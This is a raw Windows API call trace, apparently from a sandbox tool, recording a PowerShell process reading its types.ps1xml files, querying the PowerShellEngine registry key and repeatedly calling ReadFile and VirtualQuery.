	[0406.258] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd1a0 | out: lpFileInformation=0xcd1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0406.258] SetErrorMode (uMode=0x1) returned 0x1
	[0406.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.259] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd288 | out: phkResult=0xcd288*=0x1c8) returned 0x0
	[0406.260] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd20c, lpData=0x0, lpcbData=0xcd208*=0x0 | out: lpType=0xcd20c*=0x1, lpData=0x0, lpcbData=0xcd208*=0x56) returned 0x0
	[0406.260] CoTaskMemAlloc (cb=0x5a) returned 0x1b772440
	[0406.260] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd1dc, lpData=0x1b772440, lpcbData=0xcd1d8*=0x56 | out: lpType=0xcd1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd1d8*=0x56) returned 0x0
	[0406.260] CoTaskMemFree (pv=0x1b772440) 
	[0406.260] RegCloseKey (hKey=0x1c8) returned 0x0
	[0406.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.673] GetSystemInfo (in: lpSystemInfo=0xcbec0 | out: lpSystemInfo=0xcbec0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0406.674] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0407.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0407.130] SetErrorMode (uMode=0x1) returned 0x1
	[0407.130] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0407.130] GetFileType (hFile=0x328) returned 0x1
	[0407.130] SetErrorMode (uMode=0x1) returned 0x1
	[0407.130] GetFileType (hFile=0x328) returned 0x1
	[0407.130] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.130] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.130] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.130] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.131] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.131] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.131] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.131] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.131] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.132] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.132] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.133] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.133] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.133] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.133] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.134] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.134] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.135] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.135] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.135] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.135] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.136] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.136] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.136] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.136] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.136] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.137] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.137] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.137] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.137] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.138] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.138] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.138] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.140] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.140] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.141] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.141] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.141] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.141] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.141] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.142] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1000, lpOverlapped=0x0) returned 1
	[0407.142] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x1b4, lpOverlapped=0x0) returned 1
	[0407.142] ReadFile (in: hFile=0x328, lpBuffer=0x2cb9710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd228, lpOverlapped=0x0 | out: lpBuffer=0x2cb9710*, lpNumberOfBytesRead=0xcd228*=0x0, lpOverlapped=0x0) returned 1
	[0407.142] CloseHandle (hObject=0x328) returned 1
	[0407.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0407.142] SetErrorMode (uMode=0x1) returned 0x1
	[0407.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd1a0 | out: lpFileInformation=0xcd1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0407.143] SetErrorMode (uMode=0x1) returned 0x1
	[0407.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0407.143] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd288 | out: phkResult=0xcd288*=0x328) returned 0x0
	[0407.143] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd20c, lpData=0x0, lpcbData=0xcd208*=0x0 | out: lpType=0xcd20c*=0x1, lpData=0x0, lpcbData=0xcd208*=0x56) returned 0x0
	[0407.143] CoTaskMemAlloc (cb=0x5a) returned 0x1b772600
	[0407.143] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd1dc, lpData=0x1b772600, lpcbData=0xcd1d8*=0x56 | out: lpType=0xcd1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd1d8*=0x56) returned 0x0
	[0407.143] CoTaskMemFree (pv=0x1b772600) 
	[0407.143] RegCloseKey (hKey=0x328) returned 0x0
	[0407.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0407.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0407.952] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.321] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.323] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.323] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.324] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.324] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.324] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.326] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.337] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.338] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.339] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.340] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.341] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.342] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.345] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.345] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.353] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.358] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.359] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.359] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.359] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.359] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.360] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.360] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.360] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.361] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0408.361] VirtualQuery (in: lpAddress=0xcbf70, lpBuffer=0xcce30, dwLength=0x30 | out: lpBuffer=0xcce30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
